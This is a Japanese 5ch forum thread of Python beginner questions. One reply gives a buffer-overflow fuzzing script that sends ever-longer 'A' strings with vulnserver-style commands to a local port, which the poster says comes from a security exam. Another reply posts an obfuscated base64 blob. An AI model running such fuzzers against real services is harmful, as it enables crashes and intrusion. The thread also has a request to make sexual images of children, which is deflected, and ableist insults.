Pythonのお勉強 Part60

レス数が1000を超えています。これ以上書き込みはできません。
1デフォルトの名無しさん
垢版 |
2019/04/30(火) 08:34:23.34ID:sH/UeeJ6
★当スレにRubyのソースコード類を書くことを禁ず★
☆Ruby等、Pythonではないプログラミング言語での回答類を書くのも禁止
☆「Ruby では」「Rubyでは」をNGワード登録推奨

◆エラーを解決したいときはエラー表示と
 環境(Pythonのバージョン・OS・IDEの種類とバージョン)をシッカリ書く

◆Pythonのソースコードを5ちゃんにコピペするとインデントが崩れるので
  ↓にあげてるような、ソースコード用サイトに貼ってきてくだしあ
    (スクリーンショットをimgurうp等の横着をしない)
ttp://ideone.com/      推定最大手。デフォ設定がCなので、Pythonするには選択ボタン押下がピコ手間かも。
ttp://codepad.org/      ほぼ直感的に使える。Run codeボタンあり。
ttp://pastebin.com/     まずまずシンプル。
ttp://dpaste.com/      とてもシンプル。消えるまでの日数は十分長ーく指定のこと。
ttps://jupyter.org/try    (旧try.jupyter.org)ちょっとめんどうそう。
ttps://ja.osdn.net/pastebin/ ログイン必須になりやがった(゚Д゚#)

◇Pythonオフィシャルサイト
http://www.python.org/

◇まとめwiki
ttp://python.rdy.jp/

●関連スレ●
くだすれPython(超初心者用) その43【Ruby禁止】
http://mevius.5ch.net/test/read.cgi/tech/1555397061/

〇前スレ
Pythonのお勉強 Part59
http://mevius.5ch.net/test/read.cgi/tech/1552194662/

次スレの建立は>>985が挑戦する
2019/07/18(木) 00:56:24.76ID:cMXYIInr
配列の先頭の値をとるのは[0]以外に書き方ない?
2019/07/18(木) 01:03:25.83ID:15OtSxUH
>>950
なぜそれだといかんの?
2019/07/18(木) 01:13:39.91ID:cMXYIInr
他の言語だとheadとかあるじゃん
そういうのないかなと思って
2019/07/18(木) 01:18:27.23ID:/biP2h00
*aでも0[a]でも好きに書いたら良いじゃない
2019/07/18(木) 01:21:59.08ID:ixQnk4MT
There should be one-- and preferably only one --obvious way to do it.
@import this
2019/07/18(木) 01:40:39.28ID:ZY6yayDo
a[-len(a)]
2019/07/18(木) 07:52:25.15ID:wt4KLm9c
https://docs.python.org/ja/3/tutorial/controlflow.html#the-range-function
>組み込み関数 range() が便利です。

これタイポだよね?
rangeってクラスでしょ
957デフォルトの名無しさん
垢版 |
2019/07/18(木) 11:46:44.98ID:NKkoL56O
Python2のときは
>>> type(range)
<type 'builtin_function_or_method'>
>>> type(xrange)
<type 'type'>
だから、3用に書き換えたときにに書き換え忘れたのかもね。
2019/07/18(木) 12:26:41.99ID:wt4KLm9c
そういうことか
list()も関数と呼んでるんだよな
2019/07/18(木) 12:30:59.38ID:0kCblb2b
理想的には関数であるべきかクラスであるべきか、の宗教論争になる
2019/07/18(木) 22:08:41.79ID:JZFbYeti
悪意ある「Python」ライブラリーがPyPIで発見される--研究者が報告
Catalin Cimpanu(Special to ZDNet.com) 翻訳校正:編集部 2019年07月18日 11時12分
https://japan.zdnet.com/article/35140047/

 セキュリティ企業のReversingLabsは、悪意ある「Python」ライブラリーが公式の
「Python Package Index」(PyPI)にアップロードされていることを発見した。

 これら3つのパッケージ(「libpeshnx」「libpesh」「libari」)は、同じユーザー
(名前はruri12)によって作成されており、2017年11月以降、20カ月近くにわたってPyPI
からダウンロード可能な状態にあった。2019年7月に入って、これらのパッケージは、
ReversingLabsのセキュリティ研究者らによって発見された。

 ReversingLabsは7月9日、PyPIのリポジトリメンテナーに通報し、PyPIのセキュリティ
チームはその日のうちにこれらのパッケージを削除した。(中略)

 ReversingLabsによると、バックドアはインタラクティブシェルであり、攻撃者はそれを
使って、3つのパッケージがインストールされたコンピューターに接続し、コマンドを実行
した可能性があるという。

 ReversingLabsが3つのパッケージを見つけたとき、バックドアはlibpeshnxでのみアク
ティブになっていたが、ほかの2つのパッケージ(libpeshとlibari)には「コードのない
悪意ある関数への参照」が含まれていた。このことは、作者がバックドアを削除したか、
あるいは、ほかの2つのパッケージのバックドアを含むバージョンをロールアウトする準備
を進めていた可能性を示唆している。
2019/07/18(木) 22:12:13.82ID:/biP2h00
ルリルリ
2019/07/18(木) 23:33:11.30ID:ixQnk4MT
>>960
新参者は Xxx を使っておけという時
言語 Xxx はクラッカーにとってトロイの木馬仕込み時ってわけだ
963デフォルトの名無しさん
垢版 |
2019/07/19(金) 23:56:12.27ID:f2UtXuai
>>950
>>952
lst [0]のが短くて良いと思うが。。。

Haskellのheadは別に便利とは思わんよ?
(引数の時点で(x:xs)とか出来るので滅多に使わんし)

Pythonのlst[n:]でHaskellのdrop n lst相当な方が羨ましいが。

第一、欲しいなら作れば良いじゃ無いか。
964デフォルトの名無しさん
垢版 |
2019/07/20(土) 05:54:56.19ID:bpLSWw1y
エモいITキッズフェスが割とヤバ目なので寄付しろ
https://twitter.com/kondo_orange/status/1084963372624420864?s=21


https://twitter.com/kondo_orange/status/1147771514881601536?s=21

チャイルドフィルター、白Zでおなじみサイバーセキュリティ財団 宮脇プレゼンツ

https://csf.or.jp/about/

https://twitter.com/biwam/status/1108021515117715461?s=21

https://twitter.com/garhitech/status/1088991484978724865?s=21


https://twitter.com/jellyfishmovie/status/1126480155960983552?s=21

https://twitter.com/iteenslab/status/820544834310062081?s=21




https://readyfor.jp/projects/exakids2019

https://twitter.com/kondo_orange/status/1091538007633518592?s=21
https://twitter.com/5chan_nel (5ch newer account)
2019/07/20(土) 06:10:38.24ID:1p062bPE
なにこの集団ちんどん屋かな?w
2019/07/20(土) 07:03:51.33ID:RdS7+qpt
pytorchの解説がどれもむずかしいのですが、初心者ははじめに何やれば良いんでしょうか
最終目的はaiでロリ画像を作ることです
2019/07/20(土) 08:15:40.55ID:P9wbpcK8
>>966
スレチする自称初心者に教えてやることは
  投稿前に必ず>>1くらいは全部読め
  半年ROMれ
くらいだな
2019/07/20(土) 12:06:50.56ID:DSdlNNWZ
これバッファオーバーフロー起こすとかで実行してみたんだが、全くそんな様子はない
どっか文法間違ってる?

import socket
buffer=["A"]
counter=50
while len(buffer) <=100:
buffer.append("A"*counter)
counter=counter+50
commands=["HELP", "STATS.", "RTIME.", "ITIME.", "SRUN.","TRUN.", "GMON.",
"GDOG.", "KSTET.", "GTER.", "HTER.", "LTER.", "KSTAN."]
for command in commands:
for buffstring in buffer:
print ("Exploiting" +command+":"+str(len(buffstring)))
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('127.0.0.1',135))
s.recv(50)
s.send(command+buffstring)
s.close()
2019/07/20(土) 12:08:04.60ID:DSdlNNWZ
ちなみに消えちゃってるがちゃんとforの後のインデントや冒頭スペースは入れてる
2019/07/20(土) 12:34:25.27ID:e0GouTyf
全バージョンで?
2019/07/20(土) 12:52:58.13ID:yIzn2tUG
触ったことないんだけどAIで使うって聞いて、遅いって聞いて、は?と思ったら
遅いから数学関数を多数用意したところ、数学関数を多用するAIに向いてると

あとインデント式は普通の開発には厄介な面もあるけど、
ひたすら論理の整理が必要なAIには視認性が良くて便利なのかね
2019/07/20(土) 13:06:10.76ID:gi8tQNT4
>>971
Rubyよりマシだから
2019/07/20(土) 13:08:21.22ID:P9wbpcK8
>>968-969
まず>>1を嫁
特に4行目以降はしっかり嫁
2019/07/20(土) 13:08:56.78ID:P9wbpcK8
>>971
もっとしらべてからでなおしてきましょう
2019/07/20(土) 14:00:42.75ID:yIzn2tUG
何が気に入らんのかねこの基地外はw
976デフォルトの名無しさん
垢版 |
2019/07/20(土) 14:45:07.62ID:1y0e4GF6
>>962
libpeshnxもlibpeshもlibariも聴いたことないな

>>963
2019/07/20(土) 16:51:17.49ID:enH3UtlX
971の前半のガイジ臭やべえ
2019/07/20(土) 17:31:12.31ID:P9wbpcK8
アスペというよりADHD系だな
2019/07/20(土) 18:05:53.13ID:MLRoJe+u
>>973
すみませんここに貼りました
http://codepad.org/5ZfiLEBw
改めておなしゃす!
980デフォルトの名無しさん
垢版 |
2019/07/20(土) 18:21:08.11ID:ppdy8tl0
臭う

●buffer=["A"]

●buffer.append("A"*counter)

●for buffstring in buffer:
●print ("Exploiting" +command+":"+str(len(buffstring)))

一酸化炭素くさい
2019/07/20(土) 18:34:39.82ID:P9wbpcK8
>>979
  _, ._
( ゚ Д゚)っ >環境(Pythonのバージョン・OS・IDEの種類とバージョン)をシッカリ書く

たしか
さいきんのPython3系は簡単お手軽なバッファオーバーフローができないように
セキュリティホールふさいだとかなんとかいう
2019/07/20(土) 20:10:18.56ID:P9wbpcK8
>>980 おつ

>>979まあいいや
↓これで 思ってたように動くようになるんジャネーノ( ´,_ゝ`)
ttp://codepad.org/edvUIEBT
2019/07/20(土) 20:40:20.56ID:P9wbpcK8
Pythonのお勉強 Part61
http://mevius.5ch.net/test/read.cgi/tech/1563622784/

ちょっとはやいがたてれたのでたてた
2019/07/20(土) 21:30:17.02ID:MLRoJe+u
>>982
サンクスコ!なんとなくWhile文がAの参照の悪さをしてそうでつね!
2019/07/20(土) 22:03:12.00ID:P9wbpcK8
>>984
>While文がAの参照の悪さをしてそう
ないない

ぶっちゃけると
   >>979のコードの4−7行目はいったい何のためにあるのか察せなかった

あと

手打ちで写経したのかこれ?

スペースの数が4つじゃないところがあったり
8行目んとこのリストのHELPだけ「.」がなかったり
7行目の書き方は非推奨だったり
するんだが。



PEP8(PythonのGoodな書き方についての原則ルール)を読もう
ttps://pep8-ja.readthedocs.io/ja/latest/
986デフォルトの名無しさん
垢版 |
2019/07/20(土) 22:33:54.07ID:zBgCRbaT
>>980
一酸化炭素は無臭だから怖い
2019/07/20(土) 22:42:14.22ID:P9wbpcK8
>>986
(`・ω・´)っ◇ 座布団1枚!
2019/07/20(土) 23:38:50.97ID:MLRoJe+u
>>985
大サンクスコヽ(`Д´)ノ
ぶっちゃけると、どっかのセキュリティベンダー試験のWeb問題の中の、バッファオーバーフローをテーマにした問題で、
BOFを引き起こす意図であろうPython文が画像になっていて、その文字も曖昧なコード部分をいったい全部手書きにしたもの
2019/07/21(日) 05:13:00.04ID:utEuQb4D
>>988
>BOFを引き起こす意図であろうPython文
正しくしちゃうとコピーキャットが湧くから
わざと変にしてあるのかもしらんよ (´・ω・`)と いま おもた
2019/07/21(日) 08:15:24.48ID:LZnzMQmE
これネットワーク攻撃用のコードで、BOFが起きるのは相手先のサービスなのでは
991デフォルトの名無しさん
垢版 |
2019/07/21(日) 12:25:10.85ID:pUigi9Rs
a='eJyLMPVXDFB1cAyINokJiIowNdEIiNM0d3bWNK9VcfV0dgzSDQ5x9HNxDHLRdfQL8QzzDAoN1g1xDQ7RdfP0cVVU8dD20AIAdFQSDw=='
open('/tmp/txt', 'w').write(zlib.decompress(base64.b64decode(a)))
2019/07/21(日) 12:56:34.65ID:utEuQb4D
>>991
やめーやwwwww
993デフォルトの名無しさん
垢版 |
2019/07/21(日) 13:25:44.57ID:pX/j+UhJ
圧縮した方がデカくなってしまったな
2019/07/21(日) 13:38:48.79ID:utEuQb4D
>>993
>デカくなってしまった
元がこのサイズなら
自然な結論でしょうや
2019/07/21(日) 14:11:43.62ID:ujIu4Dcu
>>991
これは何してるの(´・ω・)?
2019/07/21(日) 14:15:12.38ID:utEuQb4D
>>991
ヒント
・これだけでは不完全なので動かない
    足りないimportはいくつでしょーか
・たぶん1か所だけぼみょうにまちがっつる
    半角1文字足りない
2019/07/21(日) 14:16:07.95ID:utEuQb4D
>>996
アンカー間違った(´・ω・`)ごめす
誤× >>991
正◎ >>995
2019/07/21(日) 14:23:23.00ID:vUdOQrA4
要するにブラクラかなんかで存在自体が犯罪かなんかだろ
2019/07/21(日) 14:28:14.29ID:utEuQb4D
>>998
>存在自体が犯罪かなんか
なかなかいい発想だが
だったら>>992で芝生はやしてワロテる暇ないから(・∀・)


>>次スレ
Pythonのお勉強 Part61
http://mevius.5ch.net/test/read.cgi/tech/1563622784/
2019/07/21(日) 14:46:11.73ID:m/GaQUZU
おつ
10011001
垢版 |
Over 1000Thread
このスレッドは1000を超えました。
新しいスレッドを立ててください。
life time: 82日 6時間 11分 48秒
レス数が1000を超えています。これ以上書き込みはできません。
5ちゃんねるの広告が気に入らない場合は、こちらをクリックしてください。
ニューススポーツなんでも実況